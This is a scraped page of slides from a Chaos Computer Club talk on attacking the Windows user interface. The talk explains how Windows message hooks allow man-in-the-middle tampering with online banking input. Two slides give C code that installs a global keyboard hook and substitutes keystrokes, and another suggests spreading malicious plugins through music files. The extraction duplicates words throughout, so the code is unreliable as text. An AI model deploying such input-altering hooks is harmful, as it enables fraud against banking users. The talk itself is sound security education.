attacking the attacking the user machine machine user
play

Attacking the Attacking the User- -Machine Machine User - PowerPoint PPT Presentation

Mar 09, 2023 •285 likes •455 views

Attacking the Attacking the User- -Machine Machine User Interface Interface A speach speach from from Volker Birk, Volker Birk, dingens dingens@ @bumens bumens. .org org A Chaos Computer Club ERFA Kreis Ulm Chaos Computer Club

  1. Attacking the Attacking the User- -Machine Machine User Interface Interface A speach speach from from Volker Birk, Volker Birk, dingens dingens@ @bumens bumens. .org org A Chaos Computer Club ERFA Kreis Ulm Chaos Computer Club ERFA Kreis Ulm http://www www. .ulm ulm. .ccc ccc.de .de, http:// , http://www www. .ccc ccc.de .de http://

  2. What's up? up? What's � Everybody Everybody searches searches for for security security for for � machine- -machine machine interfaces interfaces. . machine � Some implementations Some implementations of of cryptography cryptography � are OK OK for now for now. . are � Nobody Nobody thinks about the security thinks about the security � problems of of the the user user- -machine machine problems interfaces. . interfaces CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  3. Example: internet- -banking banking Example: internet Internet I' I'm m in! ! That That was was PC PC Webs bserv erver Mainfram Mainframe eas easy! y! at the he ban bank CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  4. The idea idea is is not not really really new new: : The CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  5. How does the Windoze Windoze GUI GUI How does the work? work? � Windoze Windoze is a timesharing system is a timesharing system � � hardware drivers in the kernel, mostly interrupt hardware drivers in the kernel, mostly interrupt � driven driven � Processes and threads in the user land Processes and threads in the user land � � Windoze Windoze is a message based GUI is a message based GUI � � System Message Queue System Message Queue - -> System Dispatcher > System Dispatcher � � - -> Thread Message Queue > Thread Message Queue - -> Thread Dispatcher > Thread Dispatcher � � - -> > WindowProc WindowProc for every Window Class. for every Window Class. � CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  6. How does the Windoze Windoze GUI GUI How does the System Dispatcher work? work? Thread-Message-Q System-Message-Q Translate CPU Driver Thread “Click!” IRQ12 Dispatcher WM_NC WM_NCHITTE HITTEST ST WindowProc (Message Handler) CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  7. hello, world hello, world int WinMain WinMain(HINSTANCE (HINSTANCE hInstance hInstance, , int HINSTANCE hPrevInstance hPrevInstance, , HINSTANCE LPSTR lpCmdLine lpCmdLine, , LPSTR int nCmdShow) { ) { int nCmdShow MSG msg msg; ; MSG if (!hPrevInstance if (! hPrevInstance) ) InitApp InitApp( (hInstance hInstance); ); InitInstance( InitInstance (hInstance hInstance, , nCmdShow nCmdShow); ); while (GetMessage GetMessage(& (&msg msg, NULL, 0, 0)) { , NULL, 0, 0)) { while ( TranslateMessage(& (&msg msg); ); TranslateMessage DispatchMessage(& (&msg msg); ); DispatchMessage } } return msg.wParam return msg. wParam; ; Thread Dispatcher } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  8. hello, world hello, world ATOM InitApp InitApp(HINSTANCE (HINSTANCE hInstance hInstance) { ) { ATOM WNDCLASSEX wcex WNDCLASSEX wcex; ; memset(& (&wcex wcex, 0, , 0, sizeof sizeof(WNDCLASSEX)); (WNDCLASSEX)); memset wcex. wcex .cbSize cbSize = = sizeof sizeof(WNDCLASSEX); (WNDCLASSEX); wcex.style = CS_HREDRAW | CS_VREDRAW; .style = CS_HREDRAW | CS_VREDRAW; wcex wcex. .lpfnWndProc lpfnWndProc = (WNDPROC) = (WNDPROC) WndProc WndProc; ; wcex Message Handler wcex. .hInstance hInstance = = hInstance hInstance; ; wcex wcex. wcex .hIcon hIcon = = LoadIcon LoadIcon(NULL, IDI_APPLICATION); (NULL, IDI_APPLICATION); wcex. .hCursor hCursor = = LoadCursor LoadCursor(NULL, IDC_ARROW); (NULL, IDC_ARROW); wcex wcex. .hbrBackground hbrBackground = (HBRUSH)(COLOR_WINDOW+1); = (HBRUSH)(COLOR_WINDOW+1); wcex wcex. wcex .lpszClassName lpszClassName = " = "HelloWorldClass HelloWorldClass"; "; return RegisterClassEx RegisterClassEx(& (&wcex wcex); ); return } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  9. hello, world hello, world LRESULT CALLBACK WndProc WndProc(HWND (HWND hWnd hWnd, UINT message, , UINT message, LRESULT CALLBACK WPARAM WPARAM wParam wParam, LPARAM , LPARAM lParam lParam) { ) { PAINTSTRUCT ps ps; ; PAINTSTRUCT HDC hdc hdc; ; HDC switch (message) { switch (message) { case WM_PAINT: case WM_PAINT: hdc = = BeginPaint BeginPaint( (hWnd hWnd, & , &ps ps); ); hdc RECT rt rt; ; RECT GetClientRect GetClientRect( (hWnd hWnd, & , &rt rt); ); DrawText( (hdc hdc, "hello, world", 12, & , "hello, world", 12, &rt rt, , DrawText DT_CENTER); DT_CENTER); EndPaint EndPaint( (hWnd hWnd, & , &ps ps); ); break; break; case WM_CLICK: case WM_CLICK: ... ... } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  10. The weak point: Hooks. The weak point: Hooks. � Message Hooks can be installed from any Message Hooks can be installed from any � application before any message dispatcher. application before any message dispatcher. � Messages could be filtered or altered and Messages could be filtered or altered and � transported to the Message Handlers. transported to the Message Handlers. � Is there a security system? No, Sir. Is there a security system? No, Sir. � � Attacking pattern: Man in the middle attack. Attacking pattern: Man in the middle attack. � CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  11. Man- -In In- -The The- -Middle Middle- -Attack. Attack. Man Message Windows Application Hook (i.e. IE for banking ;-) “Click!” CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  12. Code sample Code sample void InstallHook InstallHook() { () { void m_hLib hLib = = LoadLibrary LoadLibrary("Hook. ("Hook.dll dll"); "); m_ FARPROC pSysMsgProc pSysMsgProc = = GetProcAddress GetProcAddress(m_ (m_hLib hLib, , FARPROC "KeyboardProc KeyboardProc"); "); " PSETHOOKHANDLE pSetHookHandle pSetHookHandle = = PSETHOOKHANDLE (PSETHOOKHANDLE) GetProcAddress GetProcAddress(m_ (m_hLib hLib, , (PSETHOOKHANDLE) "SetInfo SetInfo"); "); " m_hHook hHook = = SetWindowsHookEx SetWindowsHookEx(WH_KEYBOARD, (WH_KEYBOARD, m_ (HOOKPROC) pSysMsgProc pSysMsgProc, m_ , m_hLib hLib, 0); , 0); (HOOKPROC) (*pSetHookHandle pSetHookHandle)(m_ )(m_hHook hHook); ); (* } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  13. Code sample Code sample static HHOOK hHook hHook = 0; = 0; static HHOOK void SetInfo SetInfo(HHOOK (HHOOK newHook newHook) { ) {hHook hHook = = newHook newHook;} ;} void LRESULT CALLBACK KeyboardProc LRESULT CALLBACK KeyboardProc( (int nCode int nCode, WPARAM , WPARAM wParam wParam, , LPARAM lParam lParam) { ) { LPARAM if (nCode nCode == HC_ACTION && == HC_ACTION && wParam wParam == VK_DECIMAL) { == VK_DECIMAL) { if ( // hPlayback hPlayback = = SetWindowsHookEx SetWindowsHookEx(WH_JOURNALPLAYBACK, (WH_JOURNALPLAYBACK, // // JournalPlaybackProc, , theApp theApp.m_ .m_hInstance hInstance, 0); , 0); // JournalPlaybackProc if ( if (lParam lParam & 0x80000000) & 0x80000000) keybd_event(13502, 52, KEYEVENTF_KEYUP, 0); _event(13502, 52, KEYEVENTF_KEYUP, 0); keybd else else keybd keybd_event(13502, 52, 0, 0); _event(13502, 52, 0, 0); return 1; return 1; } } return return CallNextHookEx CallNextHookEx( (hHook hHook, , nCode nCode, , wParam wParam, ,lParam lParam); ); } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  14. Being creative with internet Being creative with internet banking banking � User enters "42", computer understands User enters "42", computer understands � "23", user reads "42" "23", user reads "42" � User is authenticating this transaction. User is authenticating this transaction. � � Computer is transacting "23". Computer is transacting "23". � � With an Internet Explorer With an Internet Explorer plugin plugin we we � don't need any extra processes. don't need any extra processes. � Distributing such Distributing such plugins plugins made easy by made easy by � using music files with Windows XP. using music files with Windows XP. CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  15. And now? What can we do? And now? What can we do? � Better forget Windows for banking Better forget Windows for banking � purposes. purposes. � Better forget the Macintosh for banking Better forget the Macintosh for banking � purposes also. purposes also. � X11 offers a security system. But who X11 offers a security system. But who � knows that and who is using it? knows that and who is using it? � Better: cold boot from CD. Better: cold boot from CD. � CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  16. Chaos Computer Club. Chaos Computer Club. Kabelsalat ist gesund. Kabelsalat ist gesund. Thank you you! ! Thank Volker Birk, CCC ERFA Kreis Ulm Volker Birk, CCC ERFA Kreis Ulm mailto:dingens dingens@ @bumens bumens. .org org mailto: http://www www. .ulm ulm. .ccc ccc.de .de http:// http://www www. .ccc ccc.de .de http:// CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Recommend

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Attacking Machine Learning: On the Security and Privacy of Neural Networks Nicholas Carlini

Attacking Machine Learning: On the Security and Privacy of Neural Networks Nicholas Carlini

SESSION ID: MLAI-W03 Attacking Machine Learning: On the Security and Privacy of Neural Networks Nicholas Carlini Research Scientist, Google Brain #RSAC Act I: On the Security and Privacy of Neural Networks #RSAC Let's play a game

1.07k views • 103 slides
Automated Reasoning (what this course is about) machine does 'thinking' user does 'thinking'

Automated Reasoning (what this course is about) machine does 'thinking' user does 'thinking'

0ai Automated Reasoning (what this course is about) machine does 'thinking' user does 'thinking' AUTOMATED REASONING user does nothing machine keeps the books Krysia Broda Concerned with GENERAL DEDUCTION - applicable in many areas.

357 views • 6 slides
Evaluating Machine Learned User Experiences Asela Gunawardana Intelligent User Experiences

Evaluating Machine Learned User Experiences Asela Gunawardana Intelligent User Experiences

Evaluating Machine Learned User Experiences Asela Gunawardana Intelligent User Experiences Microsoft Research The typical machine learning problem ,

560 views • 45 slides
# Logins by User Joe to Machine Z 30 25 20 15 10 5 0 A B C D Client System Hour of

# Logins by User Joe to Machine Z 30 25 20 15 10 5 0 A B C D Client System Hour of

# Logins by User Joe to Machine Z 30 25 20 15 10 5 0 A B C D Client System Hour of User Joe's Logins to Machine Z 10 8 Frequency 6 4 2 0 0 5 10 15 20 Hour of Day 1 day of crud seen at ICSI (110K times) Adversary

446 views • 13 slides
Advanced Programming Graphical User Interface (GUI) Human-Machine Interfaces The ways in which a

Advanced Programming Graphical User Interface (GUI) Human-Machine Interfaces The ways in which a

Advanced Programming Graphical User Interface (GUI) Human-Machine Interfaces The ways in which a software system interacts with its users . Command Line Graphical User Interface - GUI Touch User Interface - TUI Multimedia (voice, animation,

690 views • 49 slides
Automated Reasoning (what this course is about) AUTOMATED REASONING machine does 'thinking'

Automated Reasoning (what this course is about) AUTOMATED REASONING machine does 'thinking'

0ai Automated Reasoning (what this course is about) AUTOMATED REASONING machine does 'thinking' machine does book-keeping, Krysia Broda user does nothing user does 'thinking'. Room 378 Concerned with GENERAL DEDUCTION - applicable in many

390 views • 5 slides
Last Class: Introduction to Operating Systems User apps Virtual machine interface OS physical

Last Class: Introduction to Operating Systems User apps Virtual machine interface OS physical

Last Class: Introduction to Operating Systems User apps Virtual machine interface OS physical machine interface hardware An operating system is the interface between the user and the architecture. History lesson in change. OS

355 views • 14 slides
useworld.net An open user adaptive scientific internet portal for the human machine interaction

useworld.net An open user adaptive scientific internet portal for the human machine interaction

useworld.net An open user adaptive scientific internet portal for the human machine interaction community L. Urbas, S. Leuchter, M.C. Kindsmller, R. Weyers Center of Human-Machine Systems Technische Universitt Berlin Mai 22, 2003

174 views • 13 slides
Five Shades of Noise: Analyzing Machine Translation Errors in User-Generated Text Marlies van

Five Shades of Noise: Analyzing Machine Translation Errors in User-Generated Text Marlies van

Five Shades of Noise: Analyzing Machine Translation Errors in User-Generated Text Marlies van der Wees, Arianna Bisazza, Christof Monz Statistical Machine Translation News sentence: (mumbai,

448 views • 12 slides
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 1 1 Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have

733 views • 48 slides
What CLIR researchers assume User is User needs Machine happy (or information. searches.

What CLIR researchers assume User is User needs Machine happy (or information. searches.

iCLEF 2009 overview tags : image_search, multilinguality, interactivity, log_analysis, web2.0 J U LI O G O N ZA LO V CTO R P E I N A D O J U LI O G O N ZA LO , V CTO R P E I N A D O , P A U L CLO U G H & J U S S I K A R LG R E N

683 views • 41 slides
y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

Security bug of the week (in iOS and OS X) y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 2 2 Attacking the stack g We have seen how the

850 views • 47 slides
Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State University of New York) Joint with Seth Chaiken and Christopher R.H. Hanusa Outline 1. Chess Problems: Non-Attacking Pieces 2. Largely Czech

608 views • 17 slides
Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology for some of these slides Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have already seen how code

671 views • 47 slides
Machine Learning Lecture 1 Justin Pearson 1 2020 1

Machine Learning Lecture 1 Justin Pearson 1 2020 1

Machine Learning Lecture 1 Justin Pearson 1 2020 1 http://user.it.uu.se/~justin/Teaching/MachineLearning/index.html 1 / 33 What is this course about? Understanding various machine learning algorithms including: Linear Regression (as a machine

760 views • 33 slides
A User Study on the Effect of Aggregating Explanations for Interpreting Machine Learning Models

A User Study on the Effect of Aggregating Explanations for Interpreting Machine Learning Models

A User Study on the Effect of Aggregating Explanations for Interpreting Machine Learning Models [work in progress] Josua Krause* , Adam Perer**, Enrico Bertini* Mon, August 20th 2018 * ** Instance Explanations "Why Should I Trust

525 views • 36 slides
Human-Machine Systems Engineering Introduction & Example A User-Centered Human-Machine

Human-Machine Systems Engineering Introduction & Example A User-Centered Human-Machine

Human-Machine Systems Engineering Introduction & Example A User-Centered Human-Machine Systems Engineering Process Needs, Problems, Opportunities 2 A User-Centered Human-Machine Systems Engineering Process Needs, Problems,

652 views • 48 slides
HMSE Implementation: Models, Mockups, and Prototypes A User-Centered Human-Machine Systems

HMSE Implementation: Models, Mockups, and Prototypes A User-Centered Human-Machine Systems

HMSE Implementation: Models, Mockups, and Prototypes A User-Centered Human-Machine Systems Engineering Process Needs, Problems, Opportunities Operation,Test Analysis & Evaluation HMS: Humans, Users, Requirements Machines,

585 views • 32 slides
HMSE Implementation: Models, Mockups, and Prototypes A User-Centered Human-Machine Systems

HMSE Implementation: Models, Mockups, and Prototypes A User-Centered Human-Machine Systems

HMSE Implementation: Models, Mockups, and Prototypes A User-Centered Human-Machine Systems Engineering Process Needs, Problems, Opportunities Operation,Test Analysis & Evaluation HMS: Humans, Users, Requirements Machines,

444 views • 20 slides
Attacking and Supporting Subrogation Damages in Wildland Fire Cases CRAIG S. SIMON SUE MUNCEY

Attacking and Supporting Subrogation Damages in Wildland Fire Cases CRAIG S. SIMON SUE MUNCEY

Attacking and Supporting Subrogation Damages in Wildland Fire Cases CRAIG S. SIMON SUE MUNCEY Introduction. Audience analysis. The basics Property Insurance Subrogation ATTACKING AND SUPPORTING SUBROGATION DAMAGES IN

371 views • 19 slides
No Need to Marry to Change your Name! Attacking Profinet IO Automation Networks Using DCP S

No Need to Marry to Change your Name! Attacking Profinet IO Automation Networks Using DCP S

20.06.2019 No Need to Marry to Change your Name! Attacking Profinet IO Automation Networks Using DCP S tefan Mehner, Hartmut Knig Brandenburg University of Technology Cottbus - S enftenberg Evolution in Industrial Control Systems

675 views • 18 slides
Introduction to Kubernetes Containers container vs virtual machine Virtual machine Container

Introduction to Kubernetes Containers container vs virtual machine Virtual machine Container

Introduction to Kubernetes Containers container vs virtual machine Virtual machine Container runs its own kernel uses the host kernel user-space user-space vm user-space container user-space vm kernel host kernel host kernel

833 views • 26 slides

More recommend